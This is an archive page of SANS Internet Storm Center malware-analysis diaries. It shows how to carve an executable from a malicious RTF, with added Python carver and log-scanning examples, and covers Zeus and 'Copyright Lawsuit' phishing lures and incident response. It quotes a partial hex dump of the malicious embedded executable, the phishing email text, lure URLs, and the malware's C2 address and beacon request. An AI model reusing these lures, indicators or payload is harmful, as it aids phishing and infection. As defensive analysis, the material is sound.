Archive for the ‘ISC’ Category

Getting the EXE out of the RTF again, (Fri, Mar 26th)

Since we got some mails from readers who had trouble getting the malware extraction technique described in http://isc.sans.org/diary.html?storyid=6703 to work on yesterday's malicious copyright lawsuit sample, here's a quick walk-through again on how to carve an EXE out of a DOC or RTF file. The head of the suspicious document looks like this:

\viewkind4\uc1\pard\lang1033\f0\fs20{\object\objemb{\*\objclass Package}\objw795\objh765{\*\objdata

01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164
OK .. looks indeed like an RTF with an embedded object. The pile of numbers is all ASCII codes in hex, but before we can convert them to readable characters, we first have to strip away the initial two lines, because their presence would confuse the Perl statement that follows later.
$ cat suit_documents.doc | sed '1,2d' > suit1.temp

$ head suit1.temp
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164



Now, we are ready for the transformation from hex ASCII codes to printable characters:

$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' > suit2.temp

So far, the old method still seems to work: We locate objdata in the RTF document, strip out everything in front, then feed the blob into Perl to convert the hexadecimal codes to actual ASCII characters. I changed the Perl command slightly compared to the earlier diary on the subject, because one of the problems that people seem to have is related to how end of line is treated on Windows vs Unix. The earlier version

$ cat detail.rtf | sed -e '1,3d' | perl -ne 's/(..)/print chr(hex($1))/ge' > detail.bin

kept any DOS line terminators unchanged, which doesn't bode well for the resulting executable. The new version

$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' > suit2.temp

is now really only printing out converted hex codes, and is dropping all the CR/LF line terminators that are present in the original file after every line. The resulting file is still in Object Package format, but if you look closely, you can see the tell-tale MZ that marks the start of an executable:

What makes this case a bit more convoluted than last year's example is that the bad guys tried real hard to disguise the contents. This time, the initial file had a .DOC extension, but was in fact in .RTF format, which contained an embedded COMPLA~1.EXE that had a harmless-looking icon (3.ico) and was displayed to the user as docs.pdf. Yup, pretty sneaky. You can see all these file names in the hex output above.
Now, how to get the EXE out. According to the earlier diary mentioned above, the numbers between the EXE filename and the MZ header mark the size of the executable that we need to cut out. In this case, we have 00 10 74 00 00 in that position:
00000070 4c 41 7e 31 2e 45 58 45 00 10 74 00 00 4d 5a 90 |LA~1.EXE..t..MZ.|
What my earlier example didn't make clear is that these numbers have to be read right to left to determine the size: the first 00 terminates the filename, and the following four bytes are a little-endian value, so 10 74 00 00 reads as 0x00007410. In the current case, the size is therefore 0x007410, which converts to 29712 bytes.
Let's carve it out. We need to skip to position 0x7D (=125) from the beginning of the file to get to the MZ marker, and from there, the EXE should be 29712 bytes long.
$ dd if=suit2.temp of=suit2.exe skip=125 count=29712 bs=1
29712+0 records in
29712+0 records out
29712 bytes (30 kB) copied, 0.15203 s, 195 kB/s

$ md5sum suit2.exe
ead062fb0aca0e3d0e8c12c4cf095765 suit2.exe

Voilà! Now, we can use this hash on http://www.virustotal.com/buscaHash.html to see if someone else has analyzed this file before :)
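The sed/perl/dd steps above can be done in one go by actually parsing the two headers that the hex dump shows: the OLE 1.0 embedded-object header (01050000, 02000000, class name "Package", ...) and the Package stream behind it (02 00, the label docs.pdf, the original path of the icon, the data path C:\COMPLA~1.EXE, then the little-endian size and the MZ data). The following is an added example, my own code rather than the diary's: objdata_hex() pulls the hex out of the \objdata group and drops the CR/LF line ends exactly as the perl one-liner does, the two parse functions walk the headers, and carve() returns the file names, the skip/count values you would hand to dd, and the payload. It is run against a constructed RTF from build_sample_rtf(); the embedded "executable" there is a stub that merely starts with MZ, and all helper names are mine.

```python
"""Carve the embedded EXE out of an RTF Package object.

Added example, not the diary's own code: it automates the sed/perl/dd steps
above by parsing the OLE 1.0 and Package headers shown in the hex dump.  The
RTF at the bottom is constructed, and its "EXE" is a stub that merely starts
with MZ.
"""
import re
import struct


def objdata_hex(rtf: bytes) -> bytes:
    """Hex digits of the first {\\*\\objdata ...} group, with CR/LF and any
    other non-hex bytes dropped (what the perl one-liner above does)."""
    m = re.search(rb"\\objdata\b", rtf)
    if not m:
        raise ValueError("no \\objdata group in input")
    depth, i = 1, m.end()
    while i < len(rtf) and depth:                 # track nested braces
        depth += {ord("{"): 1, ord("}"): -1}.get(rtf[i], 0)
        i += 1
    if depth:
        raise ValueError("unterminated \\objdata group")
    return re.sub(rb"[^0-9A-Fa-f]", b"", rtf[m.end():i - 1])


def _cstring(blob: bytes, off: int):
    end = blob.index(b"\0", off)
    return blob[off:end], end + 1


def parse_ole1_embedded(blob: bytes):
    """OLE 1.0 header: version, format, class name, topic, item, native size.
    Returns (class name, offset of the native data, native size)."""
    _version, _fmt, class_len = struct.unpack_from("<III", blob, 0)
    off = 12
    class_name = blob[off:off + class_len].rstrip(b"\0")
    off += class_len
    topic_len, item_len = struct.unpack_from("<II", blob, off)
    off += 8 + topic_len + item_len
    (native_size,) = struct.unpack_from("<I", blob, off)
    return class_name, off + 4, native_size


def parse_package(blob: bytes, off: int):
    """Packager stream: 02 00, label, original path, 00 00 03 00, path length,
    data path, data size, data.  Returns (label, original path, data path,
    offset of the data, size)."""
    if blob[off:off + 2] != b"\x02\x00":
        raise ValueError("not a Package stream")
    label, off = _cstring(blob, off + 2)      # shown to the user: docs.pdf
    orig_path, off = _cstring(blob, off)      # icon/original file on the author's box
    off += 4                                  # 00 00 03 00
    (path_len,) = struct.unpack_from("<I", blob, off)
    off += 4
    data_path = blob[off:off + path_len].rstrip(b"\0")
    off += path_len
    (size,) = struct.unpack_from("<I", blob, off)   # little-endian: "read right to left"
    return label, orig_path, data_path, off + 4, size


def carve(rtf: bytes) -> dict:
    blob = bytes.fromhex(objdata_hex(rtf).decode("ascii"))
    class_name, native_off, _native_size = parse_ole1_embedded(blob)
    if class_name != b"Package":
        raise ValueError(f"unsupported object class {class_name!r}")
    label, orig_path, data_path, data_off, size = parse_package(blob, native_off)
    data = blob[data_off:data_off + size]
    return {"label": label.decode("latin-1"), "orig_path": orig_path.decode("latin-1"),
            "data_path": data_path.decode("latin-1"),
            "offset": data_off,                   # the dd skip= value
            "size": size,                         # the dd count= value
            "is_pe": data[:2] == b"MZ", "data": data}


# Constructed stand-in for the embedded executable (not a real PE).
STUB_EXE = b"MZ\x90\x00\x03\x00" + b"(constructed stub, not a real PE)"


def build_sample_rtf(payload: bytes) -> bytes:
    """Constructed RTF laid out like the diary's: a Package object hex-dumped
    into CRLF-terminated lines inside {\\*\\objdata ...}."""
    data_path = b"C:\\COMPLA~1.EXE\0"
    pkg = (b"\x02\x00" + b"docs.pdf\0" + b"C:\\icons\\3.ico\0" + b"\x00\x00\x03\x00"
           + struct.pack("<I", len(data_path)) + data_path
           + struct.pack("<I", len(payload)) + payload)
    ole = (struct.pack("<III", 0x501, 2, 8) + b"Package\0" + struct.pack("<II", 0, 0)
           + struct.pack("<I", len(pkg)) + pkg)
    hexdump = ole.hex().encode("ascii")
    lines = b"\r\n".join(hexdump[i:i + 78] for i in range(0, len(hexdump), 78))
    return (b"{\\rtf1\\ansi\\deff0\r\n\\viewkind4\\uc1\\pard\\lang1033\\f0\\fs20"
            b"{\\object\\objemb{\\*\\objclass Package}\\objw795\\objh765{\\*\\objdata\r\n"
            + lines + b"\r\n}}}\r\n")


if __name__ == "__main__":
    r = carve(build_sample_rtf(STUB_EXE))
    print(f"{r['data_path']} shown as {r['label']}: skip={r['offset']} "
          f"count={r['size']} MZ={r['is_pe']}")
```

Walking the headers on the diary's own dump gives the same numbers used for dd above: 32 bytes of OLE header, then 2 + 9 (docs.pdf) + 54 (the icon path) + 4 + 4 + 16 (C:\COMPLA~1.EXE) + 4 bytes of Package fields puts the MZ at offset 125 (0x7D), and the size field reads 0x7410 = 29712. The parser assumes one Package object whose \objdata group contains only hex digits and whitespace; RTFs that use \bin runs or carry several objects need more handling.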

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Zeus wants to do your taxes, (Thu, Mar 25th)

I've received reports of suspicious emails claiming to be from the IRS. It's a common scheme to get a user to click and run an executable.
It looks like zeus/zbot to me (more on that here: https://zeustracker.abuse.ch/faq.php; their cert is a little non-standard), but I can't share the details yet. If you've received one of these emails and don't mind sharing the details with our readers, please submit a copy (via http://isc.sans.org/contact.html).
The email looks something like (thanks for sharing Michael!):


Subject: Underreported Income Notice
Taxpayer ID: recipient-00000198499136US
Tax Type: INCOME TAX

Issue: Unreported/Underreported Income (Fraud Application)

Please review your tax statement on Internal Revenue Service (IRS) website (click on the link below):

Internal Revenue Service

hxxp://www.irs.gov.assewyx.co.uk/fraud.applications/application/statement.php?

The download in this particular link was tax-statement.exe.
If you want to check out your own logs to catch this and similar attacks, I'd suggest looking for domains that look like www.irs.gov.stuff and downloaded executables with the word tax in them.
For those with enough free time to try to track the different groups using zeus, this one has an Avalanche feel to it.
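As an added example (not part of the diary), here is the log check suggested above, written as a small scanner over proxy log lines: a hostname is flagged when the labels irs.gov occur in it but are not its real suffix (www.irs.gov.assewyx.co.uk is a host under assewyx.co.uk, not under irs.gov, while apps.irs.gov is genuine), and a download is flagged when the requested file is an .exe with "tax" in its name. The log lines and their three-column "timestamp client url" layout are constructed for the example; the function names are mine.

```python
"""Flag IRS-lookalike hostnames and tax-themed .exe downloads in proxy logs.

Added example, not from the diary.  The log lines are constructed, in an
assumed "timestamp client url" layout; adapt LOG_LINE to your proxy's format.
"""
import re
from urllib.parse import urlsplit

BRAND = "irs.gov"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<url>\S+)")


def is_lookalike(host: str, brand: str = BRAND) -> bool:
    """True when the brand's labels occur in the hostname but are not its suffix.

    www.irs.gov          -> False  (the real site)
    apps.irs.gov         -> False  (a genuine subdomain)
    www.irs.gov.x.co.uk  -> True   (irs.gov is only a decoy prefix)
    """
    labels = host.lower().rstrip(".").split(".")
    b = brand.lower().split(".")
    if labels[-len(b):] == b:
        return False
    return any(labels[i:i + len(b)] == b for i in range(len(labels) - len(b) + 1))


def is_tax_executable(path: str) -> bool:
    """True for URL paths whose file name is an .exe mentioning 'tax'."""
    name = path.rsplit("/", 1)[-1].lower()
    return name.endswith(".exe") and "tax" in name


def scan(lines):
    """Return (client, url, reasons) for every log line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                        # not a request line we understand
        parts = urlsplit(m["url"])
        reasons = []
        if is_lookalike(parts.hostname or ""):
            reasons.append("lookalike-host")
        if is_tax_executable(parts.path):
            reasons.append("tax-exe")
        if reasons:
            hits.append((m["client"], m["url"], reasons))
    return hits


# Constructed proxy log: the lookalike domain is a placeholder under .invalid.
SAMPLE_LOG = """\
2010-03-25T09:12:01 10.1.1.23 http://www.irs.gov.lookalike-example.invalid/fraud.applications/application/statement.php
2010-03-25T09:12:07 10.1.1.23 http://www.irs.gov.lookalike-example.invalid/download/tax-statement.exe
2010-03-25T09:15:44 10.1.1.40 http://www.irs.gov/pub/irs-pdf/f1040.pdf
2010-03-25T09:20:02 10.1.1.51 http://cdn.example.org/updates/TaxPrep2010.exe
""".splitlines()

if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(client, ",".join(reasons), url)
```

The suffix test is deliberately exact: only a hostname that ends in .irs.gov (or is irs.gov itself) is treated as genuine, so the decoy prefix trick in the lure URL above is caught regardless of what registered domain follows it. The tax-exe rule is noisy on its own (legitimate tax software updates also match), so treat it as a pivot for review rather than a block list.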

Responding to “Copyright Lawsuit filed against you”, (Thu, Mar 25th)

The Scenario:
Let's say you're responsible for responding to an email like that reported here: https://isc.sans.org/diary.html?storyid=8497
Assess:
Is this email a problem?
It certainly appears to be appealing to the recipient's fears with the scary legal language. There's a typo or two in there that might make you suspicious. Real or not, a document like this should be brought to the attention of your security/legal departments. So it's likely a problem of one sort or another.
What is it?
You could start by checking into the source of the email and the domain hosting the link. In this case, the originator appears to be a mail-server for a small city. The domain has been around for nearly a year, but was just updated a few days ago. Domaintools.com is your friend.
If you're equipped for it, you may want to start by checking out the document by pulling it down to a safe machine. In my case it's a unix box since it appears to be a word document. I craft a simple wget script to pull the file down looking like a vulnerable version of IE:

wget --save-cookies=./cookies -U "... .NET CLR 1.1.4322)" "$1"

Curiosity getting the better of me, I

\viewkind4\uc1\pard\lang1033\f0\fs20{\object\objemb{\*\objclass Package}\objw795\objh765{\*\objdata

01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164
6d696e6973747261746f725c4465736b746f705c332e69636f000000030010000000433a5c434f
4d504c417e312e45584500107400004d5a90000300000004000000ffff0000b800000000000000
400000000000000000000000000000000000000000000000000000000000000000000000d00000
000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072
756e20696e20444f53206d6f64652e0d0d0a240000000000000009d117d84db0798b4db0798b4d
b0798b4db0788b51b0798b2faf6a8b48b0798b4b93728b49b0798b8ab67f8b4cb0798bb2907d8b
4cb0798b526963684db0798b00000000000000000000000000000000504500004c0104000fd8a9
4b0000000000000000e0000f010b010600001e00000052000000000000c02a0000001000000030
00000000400000100000000200000400000000000000040000000000000000a000000004000000
000000020000000000100000100000000010000010000000000000100000003033000052000000
...

Yeah, that doesn't look good. Let's calculate an md5sum and see what others think of it.

$ md5sum suit_documents.doc
6db76304a2aff6bef94364b86abd8b7f suit_documents.doc

Since you're a lone responder and don't have an army of reverse engineers on your staff, we'll leverage this information to see what the group-mind knows about this.
I use the hash-search at virus total to see if someone's already working on this: http://www.virustotal.com/buscaHash.html
In this case, this yields the following results: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269529133
Some interesting things come back: we know that this is likely some sort of downloader disguised as a document.
I'll also search through http://www.threatexpert.com/ by the md5sum to see if it has already been analyzed. In this case it hasn't. I could ship it off there for analysis, or to one of the other fine sandbox tools such as Anubis (http://anubis.iseclab.org) or CWSandbox (http://mwanalysis.org/).
Looking at the earlier diary entry we see results from Anubis showing some network activity. Now we have a couple of things to look for to measure impact:

Email details to search our mail-logs to determine who received the lure message.
The URL of the initial downloader to see who clicked on it and brought it into the network.
The network behavior of a system that executed the code.
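The three searches just listed can be driven from one indicator set. The following added example (my code, not the diary's) takes the indicators that appear on this page, the lure URL on touchstoneadvisorsonline.com, the lure subject line, and the 121.14.149.132:80 request for /fwq/indux.php reported in the earlier diary, and runs them over constructed mail, proxy and network log lines, reporting for each host the furthest stage it reached: received the lure, downloaded the document, or beaconed to the C2. The log layouts, the sample IPs and the recipient-to-host mapping are assumptions made for the example.

```python
"""Scope the "Copyright Lawsuit" incident across mail, proxy and network logs.

Added example, not from the diary.  The indicators are the ones on this page
(lure URL, C2 address and request, lure subject); the three log sources, their
whitespace-separated layout and the recipient-to-host mapping are constructed.
"""
from urllib.parse import urlsplit

INDICATORS = {
    "subject": "copyright lawsuit filed against you",
    "lure_host": "www.touchstoneadvisorsonline.com",
    "lure_path": "/lawsuit/suit_documents.doc",
    "c2_ip": "121.14.149.132",
    "c2_path": "/fwq/indux.php",
}
# Higher number = deeper into the infection chain.
STAGES = {"received": 1, "downloaded": 2, "beaconed": 3}


def scope_incident(mail_log, proxy_log, net_log, user_hosts):
    """Return {host: {"stage": deepest stage seen, "evidence": [matching lines]}}."""
    found = {}

    def note(host, stage, line):
        entry = found.setdefault(host, {"stage": stage, "evidence": []})
        if STAGES[stage] > STAGES[entry["stage"]]:
            entry["stage"] = stage
        entry["evidence"].append(line)

    for line in mail_log:                   # "<ts> <recipient> <subject ...>"
        _, rcpt, subject = line.split(maxsplit=2)
        if INDICATORS["subject"] in subject.lower() and rcpt in user_hosts:
            note(user_hosts[rcpt], "received", line)

    for line in proxy_log:                  # "<ts> <client_ip> <url>"
        _, client, url = line.split(maxsplit=2)
        u = urlsplit(url)
        if u.hostname == INDICATORS["lure_host"] and u.path == INDICATORS["lure_path"]:
            note(client, "downloaded", line)

    for line in net_log:                    # "<ts> <src_ip> <dst_ip:port> <request ...>"
        _, src, dst, request = line.split(maxsplit=3)
        if dst.split(":")[0] == INDICATORS["c2_ip"] and INDICATORS["c2_path"] in request:
            note(src, "beaconed", line)
    return found


# Constructed sample data (addresses are private/TEST-NET, users are made up).
USER_HOSTS = {"alice@example.com": "10.1.1.23", "bob@example.com": "10.1.1.99"}
MAIL_LOG = [
    "2010-03-25T08:02:11 alice@example.com Copyright Lawsuit filed against you",
    "2010-03-25T08:02:12 bob@example.com Copyright Lawsuit filed against you",
    "2010-03-25T08:10:00 carol@example.com Weekly status report",
]
PROXY_LOG = [
    "2010-03-25T08:15:30 10.1.1.23 http://www.touchstoneadvisorsonline.com/lawsuit/suit_documents.doc",
    "2010-03-25T08:16:00 10.1.1.40 http://www.example.org/index.html",
]
NET_LOG = [
    "2010-03-25T08:17:05 10.1.1.23 121.14.149.132:80 GET /fwq/indux.php?U=1234@1014@1@0@0@...",
    "2010-03-25T08:18:00 10.1.1.40 192.0.2.10:80 GET /",
]

if __name__ == "__main__":
    for host, info in sorted(scope_incident(MAIL_LOG, PROXY_LOG, NET_LOG, USER_HOSTS).items()):
        print(f"{host}: {info['stage']} ({len(info['evidence'])} log lines)")
```

A host that only received the lure goes on the watch list, one that downloaded the document gets the malware incident response procedure, and one that beaconed is treated as compromised; the evidence list per host is what goes into the report mentioned further down.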

How bad is it for us?
Using those details it's time to evaluate the impact this attack has had on your firm. If you have anyone who downloaded the file, or evidence of a machine reaching out for the next stage, then you pull your Malware Incident Response document off of the shelf and follow that. We all have differing levels of documentation to refer to, but there's always some sort of plan, even if it's "update resume".
Protect
While you're assessing the impact (greps take a while to run sometimes) you have some information that you can leverage to protect the people in your network. You have email addresses and URLs to block and malware to submit to your vendor (assuming they're not on the virustotal list like mine wasn't). Acting quickly on this protection phase makes your clean-up phase go easier.
Respond/Clean-up
Now that you have your list of machines that were exposed and your Malware incident response document handy, you follow that to make your systems and network all shiny and clean.
Report
This step is important.
In my environment, my boss likes to know what it is that I'm doing in the dark data closet. So keeping track of the event, its impact, etc. is good for not only tracking the incident, but also review time.
When you were researching the IP that sent the email and the one hosting the URL (you still have that up in a browser, right?) it is also critical that you report that to the abuse contacts. Send a kind email reporting the issue (because they'll likely get a few reports, and most of them might not be so kind), which helps more than just your own environment.
Learning from Others/Helping Others
You will want to follow a similar process in response to events reported here and in other blogs and media. It not only helps protect you from what is hitting other folks, but you may also uncover a gap in your internal detection process.
By submitting malicious URLs to proxy-filter vendors, and malware to AV vendors, you help protect not only your environment, but also your neighbors. If fewer of your neighbors are getting infected, then that's fewer spam-bots and phishing sites that eventually target you.

“Copyright Lawsuit filed against you”, (Thu, Mar 25th)

Overview
An email is being sent out warning the recipient of a Copyright Lawsuit filed against you. We received a copy here and a number of .EDUs have reported its receipt. It looks similar to:

March 24, 2010
Crosby Higgins
350 Broadway, Suite 300
New York, NY 10013

To Whom It May Concern:

On the link bellow is a copy of the lawsuit that we filed against you in court on March 11, 2010.
Currently the Pretrail Conference is scheduled for April 11th, 2010 at 10:30 A.M. in courtroom #36.
The case number is 3485934. The reason the lawsuit was filed was due to a completely inadequate response from your company for copyright infrigement that our client Touchstone Advisories Inc is a victim of Copyright infrigement

hXXp://www.touchstoneadvisorsonline.com/lawsuit/suit_documents.doc

Touchstone Advisories Inc has proof of multiple Copyright Law violations that they wish to present in court on April 11th, 2010.

Sincerely,

Mark R. Crosby
Crosby Higgins LLP

The law-firms named in the email, header, and sending server all appear to be a mish-mash of existing firms.
If a user clicks on the link and opens the document it will attempt to download additional payload.
Initial Detection
Currently only a few AV solutions detect the initial document: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269486837
Behavioral Notes
Following Daniel's process (http://isc.sans.org/diary.html?storyid=6703) one could extract the executable and determine what it's up to.
It appears to reach out to 121.14.149.132:80 to make a request similar to:
GET /fwq/indux.php?U=1234@1014@1@0@0@c791d4a4a147b2cd1843fe4f7f27f3a1df63f95daf0c3ddcd5f1b1e4538fd803



YouTube appears to be down from various locations with a “Http/1.1 Service Unavailable” message instead of the usual pages. If we find out more a diary will follow. Thanks to those who let us know., (Thu, Mar 25th)


Wikipedia outage, (Wed, Mar 24th)

Reader Dave alerted us to some weirdness with Wikipedia earlier today. I personally had some weirdness with the site, but it had cleared up relatively quickly. Turns out that they had some overheating problems in a datacenter and DNS re-routing took longer than expected: http://techblog.wikimedia.org/2010/03/global-outage-cooling-failure-and-dns/

Cisco security updates, (Wed, Mar 24th)

Cisco released 7 new security updates to various different products today. More information at their site: http://ww.cisco.com/en/US/products/products_security_advisories_listing.html
-Kyle Haugsness

Wax nostalgic – commodore64 updated to present time, (Wed, Mar 24th)

Slow news/incidents day.... So I will post something slightly off-topic. Yes, the story was on Slashdot and it may never come to fruition (or even be suitably priced), but the news that Commodore USA was releasing a new PC embedded into a keyboard had me reminiscing of my first computer, the commodore64. New site here: http://www.commodoreusa.net
I can't tell you how many times I read "syntax error" in response to my prodding of the BASIC language. Hmm, how do I make this into a security-related article? It would be difficult to install a keyboard logger on these things!! So perhaps it fits into your physical security strategy? Does anyone conquer physical security threats with creative choices of hardware? For instance, if you have a policy of no USB flash drives, do you enforce that through hardware restrictions?
-Kyle Haugsness

“.sys” Directories Delivering Driveby Downloads, (Wed, Mar 24th)

Our reader Paul observed malware being delivered from the .sys directory of various web sites. The URL follows the scheme:
http://evilexample.com/.sys/?action=....
In response to clicking on the link, the user is asked to install the software. According to Paul, he observed the link being delivered via Facebook which of course makes the message more plausible and it is likely that users install the software thinking it came from a Friend. Before adding a specific block for .sys, Paul's web filter caught about 60% of these exploits.
Once a user follows the link, additional exe files are downloaded from .sys directories. The file names Paul observed are p.exe, go.exe and v2captcha21.exe.


------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Firefox 3.6.2 released ahead of schedule. Fixes critical vulnerability., (Wed, Mar 24th)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute